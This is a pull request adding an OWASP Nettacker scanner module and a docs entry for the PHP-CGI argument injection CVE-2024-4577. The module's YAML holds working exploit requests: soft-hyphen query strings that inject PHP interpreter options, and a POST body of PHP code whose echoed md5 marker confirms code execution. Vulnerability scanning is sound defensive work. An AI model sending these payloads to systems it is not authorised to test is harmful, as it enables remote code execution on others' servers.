### PR TITLE
Add CVE-2024-4577 detection module (PHP CGI argument injection)

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -231,6 +231,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**paloalto_globalprotect_cve_2025_0133_vuln**' – check the target for PaloAlto GlobalProtect CVE-2025-0133 XSS vulnerability
 - '**paloalto_panos_cve_2025_0108_vuln**' – check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
 - '**payara_cve_2021_41381_vuln**' – check the target for Payara CVE-2021-41381 vulnerability
+- '**php_cgi_cve_2024_4577_vuln**' – check the target for PHP CGI argument injection CVE-2024-4577 (RCE on Windows PHP-CGI/XAMPP)
 - '**phpinfo_cve_2021_37704_vuln**' – check the target for phpinfo CVE-2021-37704 information disclosure
 - '**placeos_cve_2021_41826_vuln**' – check the target for PlaceOS CVE-2021-41826 vulnerability
 - '**prestashop_cve_2021_37538_vuln**' – check the target for PrestaShop CVE-2021-37538 vulnerability

--- a/nettacker/modules/vuln/php_cgi_cve_2024_4577.yaml
+++ b/nettacker/modules/vuln/php_cgi_cve_2024_4577.yaml
@@ -1,0 +1,67 @@
+info:
+  name: php_cgi_cve_2024_4577_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: >
+    CVE-2024-4577 is a critical argument injection vulnerability (CVSS 9.8) affecting PHP running
+    in CGI mode on Windows, commonly exposed by XAMPP installations. Due to the Windows Best-Fit
+    character encoding conversion, query string characters such as the soft hyphen (%AD) are
+    transformed into ASCII hyphens after URL decoding, allowing an unauthenticated remote attacker
+    to inject arbitrary PHP interpreter arguments (e.g. -d allow_url_include=1 combined with
+    -d auto_prepend_file=php://input) and achieve remote code execution. This flaw is actively
+    exploited in the wild and is listed in the CISA KEV catalog.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4577
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+    - https://github.com/php/php-src/security/advisories/GHSA-3qgc-jrrr-25jv
+    - https://labs.watchtowr.com/no-sleep-bug-bounties-fishing-for-xampp-now-with-more-rce/
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve
+    - cve2024
+    - cisa_kev
+    - php
+    - rce
+
+payloads:
+  - library: http
+    steps:
+      - method: post
+        timeout: 15
+        headers:
+          User-Agent: "{user_agent}"
+          Content-Type: "application/x-www-form-urlencoded"
+        ssl: false
+        allow_redirects: false
+        data: "<?php echo(md5(233*3));?>"
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{endpoint}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              endpoint:
+                # %AD (soft hyphen) is converted to an ASCII hyphen by Windows Best-Fit mapping,
+                # turning the query string into PHP CGI arguments:
+                # -d allow_url_include=1 -d auto_prepend_file=php://input
+                - "php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"
+                - "test.php?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"
+                - "index.php?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "afd4836712c5e77550897e25711e1d96" # md5(233*3), echoed back only when RCE succeeds
+              reverse: false


### PR DESCRIPTION
This PR adds a new vulnerability detection module for CVE-2024-4577 (CVSS 9.8), the critical unauthenticated PHP CGI argument injection affecting Windows PHP-CGI/XAMPP deployments. Due to Windows Best-Fit character conversion, a soft hyphen (`%AD`) in the query string is decoded into an ASCII hyphen, letting an attacker inject `-d allow_url_include=1 -d auto_prepend_file=php://input` interpreter arguments. The module probes common CGI endpoints (`php-cgi/php-cgi.exe`, `test.php`, `index.php`) and confirms exploitation by checking that the server echoes `md5(233*3)` from the injected prepend file — a high-confidence signal that avoids false positives, combined with an HTTP 200 status check per the repo's condition schema. The CVE is CISA KEV-listed, so the module carries the `cisa_kev` profile.

Fixes #1687. The YAML follows the structure of recently merged modules (e.g. metabase_cve_2026_72898) and passes the repo's own schema validation.

**Test evidence:** `pytest tests/test_yaml_schema_and_regex.py -q` → 129 passed (module's YAML validated against the HTTP payload schema). Functional e2e against a local mock vulnerable PHP-CGI: all endpoint candidates detected (`status_code: '200'`, `content: afd4836712c5e77550897e25711e1d96`); negative control against a benign 200-OK server produced no detection. Commits are DCO-signed.
